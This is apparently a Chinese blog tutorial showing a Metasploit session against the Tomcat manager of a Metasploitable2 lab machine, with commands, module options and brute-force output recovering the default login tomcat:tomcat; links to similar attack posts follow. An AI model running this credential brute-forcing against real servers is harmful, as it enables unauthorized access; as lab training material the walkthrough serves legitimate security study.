kali-渗透攻击tomcat服务

标签: kali tomcat Metasploitable2
29人阅读 评论(0) 收藏 举报
分类:

本文实验攻击目标为Metasploitable2-Linux


1、打开msfconsole控制台

root@qzwhost:~# msfconsole
[-] Failed to connect to the database: could not connect to server: Connection refused
	Is the server running on host "localhost" (::1) and accepting
	TCP/IP connections on port 5432?
could not connect to server: Connection refused
	Is the server running on host "localhost" (127.0.0.1) and accepting
	TCP/IP connections on port 5432?

                                                  
     ,           ,
    /             \
   ((__---,,,---__))
      (_) O O (_)_________
         \ _ /            |\
          o_o \   M S F   | \
               \   _____  |  *
                |||   WW|||
                |||     |||


       =[ metasploit v4.16.30-dev                         ]
+ -- --=[ 1722 exploits - 986 auxiliary - 300 post        ]
+ -- --=[ 507 payloads - 40 encoders - 10 nops            ]
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]

2、搜索有效的Tomcat模块

msf > search tomcat
[!] Module database cache not built yet, using slow search


Matching Modules
================


   Name                                                         Disclosure Date  Rank       Description
   ----                                                         ---------------  ----       -----------
   auxiliary/admin/http/tomcat_administration                                    normal     Tomcat Administration Tool Default Access
   auxiliary/admin/http/tomcat_utf8_traversal                   2009-01-09       normal     Tomcat UTF-8 Directory Traversal Vulnerability
   auxiliary/admin/http/trendmicro_dlp_traversal                2009-01-09       normal     TrendMicro Data Loss Prevention 5.5 Directory Traversal
   auxiliary/dos/http/apache_commons_fileupload_dos             2014-02-06       normal     Apache Commons FileUpload and Apache Tomcat DoS
   auxiliary/dos/http/apache_tomcat_transfer_encoding           2010-07-09       normal     Apache Tomcat Transfer-Encoding Information Disclosure and DoS
   auxiliary/dos/http/hashcollision_dos                         2011-12-28       normal     Hashtable Collisions
   auxiliary/scanner/http/tomcat_enum                                            normal     Apache Tomcat User Enumeration
   auxiliary/scanner/http/tomcat_mgr_login                                       normal     Tomcat Application Manager Login Utility
   exploit/multi/http/struts_code_exec_classloader              2014-03-06       manual     Apache Struts ClassLoader Manipulation Remote Code Execution
   exploit/multi/http/struts_dev_mode                           2012-01-06       excellent  Apache Struts 2 Developer Mode OGNL Execution
   exploit/multi/http/tomcat_jsp_upload_bypass                  2017-10-03       excellent  Tomcat RCE via JSP Upload Bypass
   exploit/multi/http/tomcat_mgr_deploy                         2009-11-09       excellent  Apache Tomcat Manager Application Deployer Authenticated Code Execution
   exploit/multi/http/tomcat_mgr_upload                         2009-11-09       excellent  Apache Tomcat Manager Authenticated Upload Code Execution
   exploit/multi/http/zenworks_configuration_management_upload  2015-04-07       excellent  Novell ZENworks Configuration Management Arbitrary File Upload
   post/multi/gather/tomcat_gather                                               normal     Gather Tomcat Credentials
   post/windows/gather/enum_tomcat                                               normal     Windows Gather Apache Tomcat Enumeration

这里我们选择使用模块auxiliary/scanner/http/tomcat_mgr_login  

3.查看tomcat_mgr_login模块有效选项

msf auxiliary(scanner/http/tomcat_mgr_login) > show options 

Module options (auxiliary/scanner/http/tomcat_mgr_login):

   Name              Current Setting                                                                 Required  Description
   ----              ---------------                                                                 --------  -----------
   BLANK_PASSWORDS   false                                                                           no        Try blank passwords for all users
   BRUTEFORCE_SPEED  5                                                                               yes       How fast to bruteforce, from 0 to 5
   DB_ALL_CREDS      false                                                                           no        Try each user/password couple stored in the current database
   DB_ALL_PASS       false                                                                           no        Add all passwords in the current database to the list
   DB_ALL_USERS      false                                                                           no        Add all users in the current database to the list
   PASSWORD                                                                                          no        The HTTP password to specify for authentication
   PASS_FILE         /usr/share/metasploit-framework/data/wordlists/tomcat_mgr_default_pass.txt      no        File containing passwords, one per line
   Proxies                                                                                           no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                                                                                            yes       The target address range or CIDR identifier
   RPORT             8080                                                                            yes       The target port (TCP)
   SSL               false                                                                           no        Negotiate SSL/TLS for outgoing connections
   STOP_ON_SUCCESS   false                                                                           yes       Stop guessing when a credential works for a host
   TARGETURI         /manager/html                                                                   yes       URI for Manager login. Default is /manager/html
   THREADS           1                                                                               yes       The number of concurrent threads
   USERNAME                                                                                          no        The HTTP username to specify for authentication
   USERPASS_FILE     /usr/share/metasploit-framework/data/wordlists/tomcat_mgr_default_userpass.txt  no        File containing users and passwords separated by space, one pair per line
   USER_AS_PASS      false                                                                           no        Try the username as the password for all users
   USER_FILE         /usr/share/metasploit-framework/data/wordlists/tomcat_mgr_default_users.txt     no        File containing users, one per line
   VERBOSE           true                                                                            yes       Whether to print output for all attempts
   VHOST                                                                                             no        HTTP server virtual host

4.指定用户名和密码文件,这里使用默认路径

msf auxiliary(scanner/http/tomcat_mgr_login) > set user_file /usr/share/metasploit-framework/data/wordlists/tomcat_mgr_default_users.txt
user_file => /usr/share/metasploit-framework/data/wordlists/tomcat_mgr_default_users.txt
msf auxiliary(scanner/http/tomcat_mgr_login) > set pass_file /usr/share/metasploit-framework/data/wordlists/tomcat_mgr_default_pass.txt
pass_file => /usr/share/metasploit-framework/data/wordlists/tomcat_mgr_default_pass.txt

5.指定要攻击的目标服务器

msf auxiliary(scanner/http/tomcat_mgr_login) > set rhosts 192.168.52.132

6.设置服务器端口号为8180

msf auxiliary(scanner/http/tomcat_mgr_login) > set rport 8180
rport => 8180

7.设置当渗透成功时停止

msf auxiliary(scanner/http/tomcat_mgr_login) > set stop_on_success true 
stop_on_success => true

8.运行渗透程序

msf auxiliary(scanner/http/tomcat_mgr_login) > exploit 

[!] No active DB -- Credential data will not be saved!
[-] 192.168.52.132:8180 - LOGIN FAILED: admin:admin (Incorrect)
[-] 192.168.52.132:8180 - LOGIN FAILED: admin:manager (Incorrect)
[-] 192.168.52.132:8180 - LOGIN FAILED: admin:role1 (Incorrect)
[-] 192.168.52.132:8180 - LOGIN FAILED: admin:root (Incorrect)
[-] 192.168.52.132:8180 - LOGIN FAILED: admin:tomcat (Incorrect)
[-] 192.168.52.132:8180 - LOGIN FAILED: admin:s3cret (Incorrect)
[-] 192.168.52.132:8180 - LOGIN FAILED: admin:vagrant (Incorrect)
[-] 192.168.52.132:8180 - LOGIN FAILED: manager:admin (Incorrect)
[-] 192.168.52.132:8180 - LOGIN FAILED: manager:manager (Incorrect)
[-] 192.168.52.132:8180 - LOGIN FAILED: manager:role1 (Incorrect)
[-] 192.168.52.132:8180 - LOGIN FAILED: manager:root (Incorrect)
[-] 192.168.52.132:8180 - LOGIN FAILED: manager:tomcat (Incorrect)
[-] 192.168.52.132:8180 - LOGIN FAILED: manager:s3cret (Incorrect)
[-] 192.168.52.132:8180 - LOGIN FAILED: manager:vagrant (Incorrect)
[-] 192.168.52.132:8180 - LOGIN FAILED: role1:admin (Incorrect)
[-] 192.168.52.132:8180 - LOGIN FAILED: role1:manager (Incorrect)
[-] 192.168.52.132:8180 - LOGIN FAILED: role1:role1 (Incorrect)
[-] 192.168.52.132:8180 - LOGIN FAILED: role1:root (Incorrect)
[-] 192.168.52.132:8180 - LOGIN FAILED: role1:tomcat (Incorrect)
[-] 192.168.52.132:8180 - LOGIN FAILED: role1:s3cret (Incorrect)
[-] 192.168.52.132:8180 - LOGIN FAILED: role1:vagrant (Incorrect)
[-] 192.168.52.132:8180 - LOGIN FAILED: root:admin (Incorrect)
[-] 192.168.52.132:8180 - LOGIN FAILED: root:manager (Incorrect)
[-] 192.168.52.132:8180 - LOGIN FAILED: root:role1 (Incorrect)
[-] 192.168.52.132:8180 - LOGIN FAILED: root:root (Incorrect)
[-] 192.168.52.132:8180 - LOGIN FAILED: root:tomcat (Incorrect)
[-] 192.168.52.132:8180 - LOGIN FAILED: root:s3cret (Incorrect)
[-] 192.168.52.132:8180 - LOGIN FAILED: root:vagrant (Incorrect)
[-] 192.168.52.132:8180 - LOGIN FAILED: tomcat:admin (Incorrect)
[-] 192.168.52.132:8180 - LOGIN FAILED: tomcat:manager (Incorrect)
[-] 192.168.52.132:8180 - LOGIN FAILED: tomcat:role1 (Incorrect)
[-] 192.168.52.132:8180 - LOGIN FAILED: tomcat:root (Incorrect)
[+] 192.168.52.132:8180 - Login Successful: tomcat:tomcat
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

从结果中可以看到找到的账号密码为tomcat,tomcat

如果本文帮助到大家,请点关注,谢谢

查看评论

入侵Tomcat服务器一次实战

到网上随便逛逛,我就会发现用JSP制作的电子商务网站多如牛毛,从JSP日渐繁荣的局面来看,适合于各种平台而且免费的Tomcat逐渐成为WEB服务器的一种选择。eBay.com与Dell计算机等知名网站...
  • leixiaohua1020
  • leixiaohua1020
  • 2013-10-08 23:50:37
  • 10655

使用metasploit进行渗透攻击步骤

鉴于对第五章内存攻防技术的原理难以理解,所以这一章我还是主要用来熟练metasploit这个工具。   攻击过程主要分为以下几步:   1.search XXX(扫描某漏洞对应的模块)   2....
  • wjy9649
  • wjy9649
  • 2017-11-12 16:27:06
  • 298

Adobe阅读器渗透实战

0x00:实验的漏洞:CVE-2010-2883 针对的软件版本:Adobe阅读器的8.2.4 到 9.3.4之间的版本.   0x01:首先我们使用msfconsole进入MSF界面,然后通...
  • Sufeiboy
  • Sufeiboy
  • 2017-03-05 05:00:53
  • 430

渗透攻防Web篇-SQL注入攻击初级

前言 不管用什么语言编写的Web应用,它们都用一个共同点,具有交互性并且多数是数据库驱动。在网络中,数据库驱动的Web应用随处可见,由此而存在的SQL注入是影响企业运营且最具破坏性的漏洞...
  • supernewer1995
  • supernewer1995
  • 2016-09-21 21:07:38
  • 778

metasploit之客户端渗透

0x00 概要 我们在无法突破对方的网络边界的时候,往往需要使用客户端渗透这种方式对目标发起攻击,比如我们想目标发一个含有后门的程序,或者是一个word文档、pdf文件。想要达到效果同时也要利用好社...
  • zkwniky
  • zkwniky
  • 2017-09-05 08:48:11
  • 235

metasploit文件格式漏洞渗透攻击(成功获得shell)

环境BT5R1 msf > use windows/fileformat/ms11_006_createsizeddibsection msf exploit(ms11_006_createsiz...
  • feier7501
  • feier7501
  • 2013-05-14 23:45:25
  • 4314

Meterpreter使用总结(2)之后渗透攻击模块

meterpreter虽然功能强大,作为单一的工具还是会有他功能的局限性,因此在metasploit4.0之后引入了后渗透攻击模块,通过在meterpreter中使用ruby编写的模块来进行进一步的渗...
  • qq_34841823
  • qq_34841823
  • 2017-02-08 16:27:12
  • 2867

渗透攻防Web篇-SQL注入攻击初级 1

Preface不管用什么语言编写的Web应用,它们都用一个共同点,具有交互性并且多数是数据库驱动。在网络中,数据库驱动的Web应用随处可见,由此而存在的SQL注入是影响企业运营且最具破坏性的漏洞之一,...
  • ZmeiXuan
  • ZmeiXuan
  • 2017-08-03 23:28:11
  • 418

WEB如何入门?各种渗透攻击如何入门?

……终于知道了 就是按这个学 http://www.runoob.com/ html又重新学的,之前那个按照W3school学习的不太好,里面很多东西都不是很好用… 应该不会再记笔...
  • myloveprogrmming
  • myloveprogrmming
  • 2016-10-12 21:23:21
  • 977

渗透与入侵4-arp-2-arp局域网攻击

ARP局域网攻击     之前已经说了ARP的基本原理了,其实就是局域网中通讯并不是通过IP,而是通过MAC,前期大家都不知道彼此的MAC是啥,然后通过广播发给别人询问某IP对应的MAC是谁,得到请...
  • u013761036
  • u013761036
  • 2017-05-22 00:40:32
  • 1161
    个人资料
    等级:
    访问量: 863
    积分: 233
    排名: 32万+
    文章存档
    最新评论